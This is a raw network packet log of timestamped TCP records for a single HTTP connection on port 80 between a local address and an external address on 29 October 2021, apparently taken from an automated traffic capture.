Oct 29, 2021 20:50:51.088416100 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088433027 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088438034 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088469028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088489056 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088490963 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088512897 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088531971 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088536024 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088553905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088572979 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088573933 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088594913 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088615894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088617086 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088639975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088663101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088664055 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088687897 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088710070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088711023 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.088733912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.088756084 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.150402069 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.154930115 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.154956102 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.154968977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.154984951 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155003071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155019999 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155035973 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155052900 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155067921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155086040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155097961 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155111074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155136108 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155208111 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155216932 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155226946 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155244112 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155261040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155276060 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155286074 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155293941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155312061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155328989 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155328989 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155345917 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155358076 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155364990 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155381918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155390024 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155400038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155416965 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155419111 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155435085 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155463934 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155467033 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155488014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155503988 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155508995 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155523062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155531883 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155541897 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155560017 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155575991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155580044 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155595064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155611038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155622005 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155631065 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155642033 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155647039 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155664921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155682087 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155684948 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155699015 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155715942 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155719042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155734062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155744076 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155750036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155767918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155783892 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155786037 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155802011 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.155829906 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.155854940 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.197098970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.197133064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.197350979 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.221386909 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221508980 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221535921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221558094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221632957 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.221669912 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.221862078 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221892118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221910000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221930027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221951008 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221970081 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.221971035 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221993923 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.221998930 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222018003 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222040892 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222040892 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222064018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222064972 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222089052 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222104073 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222111940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222136021 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222157955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222166061 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222179890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222203970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222210884 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222229004 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222239017 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222250938 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222275019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222296000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222306013 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222318888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222342014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222345114 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222366095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222388029 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222388983 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222414970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222440004 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222455025 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222460032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222486019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222486019 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222508907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222533941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222537041 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222558022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222583055 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222598076 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222608089 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222628117 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222629070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222652912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222675085 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222688913 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222697020 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222722054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222724915 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222745895 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222769022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222770929 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222791910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222814083 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.222815037 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222840071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.222857952 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.263497114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.263526917 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.263685942 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.288028002 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.288064957 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.288079023 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.288091898 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.288237095 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.288985968 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289010048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289026976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289045095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289061069 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289076090 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289093018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289103985 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289110899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289128065 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289144993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289160967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289160013 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289177895 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289189100 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289196014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289216042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289216995 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289233923 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289244890 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289252043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289268970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289284945 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289300919 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289308071 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289319992 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289336920 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289351940 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289355040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289377928 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289377928 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289393902 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289411068 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289428949 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289436102 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289447069 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289464951 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289477110 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289484978 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289506912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289506912 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289525986 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289532900 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289542913 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289560080 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289573908 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289597988 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289617062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289619923 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289634943 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289652109 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289668083 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289680958 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.289685011 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289701939 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.289722919 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.299873114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.299911976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.300052881 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330054998 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330085993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330101013 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330113888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330132961 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330151081 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330168009 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330187082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330200911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330216885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330233097 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330250025 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330267906 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330271959 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330286026 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330303907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330322981 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330338955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330355883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330359936 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330374956 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330391884 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330398083 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330414057 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330425024 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330431938 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330450058 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330467939 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330487013 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330502987 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330503941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330524921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330542088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330555916 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330559015 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330578089 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330590010 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330594063 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330610991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330626011 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330627918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330645084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330657005 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330662012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330681086 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330697060 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330701113 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330714941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330728054 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330734015 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330753088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330763102 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330770016 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330790043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330791950 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330807924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330825090 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330830097 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330843925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330863953 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330867052 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330883026 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330899954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330910921 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330918074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330940008 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.330951929 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.330970049 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.331021070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.331043959 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.331067085 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.331072092 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.331115007 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.350955963 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354399920 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354425907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354439020 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354454994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354520082 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.354561090 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.354615927 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354633093 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354648113 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.354674101 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.354706049 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356158018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356180906 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356199026 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356215000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356256008 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356280088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356282949 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356298923 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356316090 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356358051 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356487989 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356507063 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356523991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356538057 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356540918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356575012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356576920 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356594086 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356611013 CEST	80	49866	45.141.84.21	192.168.2.4
